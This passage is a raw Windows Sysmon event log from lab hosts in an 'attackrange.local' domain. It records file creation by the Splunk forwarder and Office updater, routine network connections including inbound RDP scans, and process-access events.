Shared\ClickToRun\OfficeClickToRun.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000063461Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:49.738{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC63CD16A37239CA9DB6EF1B3B70A46B,SHA256=706D4EB154EB4661A6935EDB3EC83C8FF352D34A3D9DC8D9EA96C89277C267C0,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000063460Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:48.076{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57470-false10.0.1.12-8000- 23542300x800000000000000063459Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:49.425{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484ATTACKRANGE\AdministratorC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Users\Administrator\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db-journalMD5=82A5E234B1632A9AE1080BDC4CCE89FC,SHA256=ADECA13A7AD1D0EF673061B6032D814B44B20C9B55B214C5287EE86DB4958686,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049319Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:49.634{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B3809A57D34B2D46E310DFDA5D6A4898,SHA256=0F85A31075FBD51DB26DB8BD66B8F27C2AF02BD3AF0090912A74025E79E6479A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049318Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:49.118{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=886162A774C72D2079A77E31559D334D,SHA256=E0C30DF55A3F35783403B3627F7F8A51457752719152126DC6547F3EC0F4740D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000063469Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:50.816{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=605FCD8F318AC212A8F35FC17649A2B1,SHA256=C3934456C9547B2BB60124647AC9D1D92F5290277D75FE473817B815BEDEFB0D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000063468Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:50.816{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=D8224C207092E3686FEBCE3C800E4531,SHA256=674114360EBD752563EDB7C54D0B9149BA1AFE74C2E321448E72AC8BBC3B95F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000063467Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:50.754{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=054D31A563779D8F7751767EABB57F86,SHA256=146710DDF8F8F36BCD50FFC52D8C951CB6AAE0BF1DC21FBF887AE34352FC32CE,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000063466Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:49.322{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com51673-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000063465Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:50.363{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=57B7F8ECBA270B1DBE68C92934D0CA89,SHA256=DC7F230D289D2661860CB42DA1C52A5B59AF5BF2625C5373E7BC9622C7FCF887,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000063464Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:50.019{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484ATTACKRANGE\AdministratorC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Users\Administrator\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db-journalMD5=9E4ADBDB257BB11C76D4F39DF1E5B32A,SHA256=21F8EA7993D2EB3F693A1AFEA131AF07F6C073892732A21ABB3C83A23560E7BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049323Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:50.868{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D76A52236B34C99B0F032205EEE0CA60,SHA256=20EF4BC9F19CA033FB962E96E0812BAEF6E21DBBE655EBEC508977C70E261ECB,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049322Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:48.619{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-53309-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000049321Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:47.863{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-60771-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049320Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:50.149{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4196E809A2696AD40419AA993A898A59,SHA256=511563D1A0F4A9F028838C18C117C2670AEDDCD614065A4E7B82F69253E27646,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000063479Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:51.925{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D8133150381A6219CBCC184CE006AA06,SHA256=6354712CDFC0FC8220B4665F1068536226111DB3DCF9A6A36B91FD545E26A18C,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000063478Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:50.654{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57473-false2.16.106.224a2-16-106-224.deploy.static.akamaitechnologies.com80http 23542300x800000000000000063477Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:51.769{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B6F670EED6DFF4EBE2141A3BEEBBB08,SHA256=89D2E3A32653412C6F464D228E33D762478F08C76C54CC5576F5E87FEB57D320,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000063476Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:51.737{A7A01FEF-EAF4-607E-6F0B-00000000BB01}5156ATTACKRANGE\AdministratorC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exeC:\Users\Administrator\AppData\Local\Microsoft\Office\OTele\officec2rclient.exe.db-journalMD5=140EC9E0A652D6797A16F6F2EC110E07,SHA256=6175D49B141E953C841C0CEA685DE851FE1462A588BC12F9F4BFAE5879F450BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000063475Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:51.722{A7A01FEF-EAF4-607E-6F0B-00000000BB01}5156ATTACKRANGE\AdministratorC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exeC:\Users\Administrator\AppData\Local\Microsoft\Office\OTele\officec2rclient.exe.db-journalMD5=332BC99CD51EAC6467E0F7A0F35A0864,SHA256=E3F0B4943F59DA2FEA1EBBD3AC551FA1AE1B84E228A7EED8AD9141AB9880C68B,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000063474Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:50.288{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-7462-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000063473Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:50.000{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com55245-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000063472Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:49.885{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57472-false93.184.220.29-80http 354300x800000000000000063471Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:49.872{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local64699- 354300x800000000000000063470Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:49.816{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57471-false52.114.77.34-443https 23542300x800000000000000049324Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:51.196{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33448AD3B8F4ACA64B8517DF8AF4127A,SHA256=00407D91936D8B41666B3EEE3143C061A3FA4A2189C84C5C05498B9BFFF7974C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000063482Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:52.862{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3B0F43978D24F3DB0EAB53AB3751187,SHA256=4F4E94B89F63CFBF34CC266469A68CA7E72C843C682F5004D07B5241AFB9DE2E,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000063481Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:51.792{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-8827-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000063480Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:50.953{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57474-false2.16.106.224a2-16-106-224.deploy.static.akamaitechnologies.com80http 354300x800000000000000049327Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:50.821{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52477-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x800000000000000049326Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:50.553{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-54796-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049325Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:52.212{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06C96D5EDAF621442BC3BFFCB2DF8EC0,SHA256=91A3D0CA2A8A7F072191B66DB6C2E59C882B7FB61E4F97C699914EE04CB6E3C9,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000063485Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:52.783{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57475-false2.16.106.224a2-16-106-224.deploy.static.akamaitechnologies.com80http 23542300x800000000000000063484Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:53.878{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E685422A0F8A7BC1C4A67AB725B3631,SHA256=F6DBBDA3960E95132D4DCAA538D58162DC679AF576FE5DF1F5A5EA0DE7E4665D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000063483Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:53.753{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DC1C3572931C24A4510A2B549F5224EC,SHA256=673BC12767BB9107FE26964CA679E53D3F148202219D216424D7185346306CA0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049330Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:53.884{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6F90A6B289864CD75468672FB728D897,SHA256=581F9FFD3095714F1245C2EDCFF2DC80D7480CA34CAB38A515463E53315FCEA2,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049329Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:51.916{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-56275-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049328Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:53.243{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0A09FD3E27703C6E424C41B2459BA2E,SHA256=C60048D81B399322F3C6B48BD64BFD7464398AFF54409A857F5DBF8916C54E72,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000063486Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:54.894{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A522E6E9F2C5A43988B70F79872D119,SHA256=5F117AB23048FCB178AB46196428848D574DB7BA97440B1EB368B2A8D3DBA0FB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000049344Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:54.868{85C0FFC9-B85D-607E-9B00-00000000BB01}37722740C:\Windows\system32\conhost.exe{85C0FFC9-EB02-607E-CD06-00000000BB01}1928C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049343Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:54.868{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049342Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:54.868{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049341Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:54.868{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049340Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:54.868{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049339Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:54.868{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049338Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:54.868{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049337Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:54.868{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049336Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 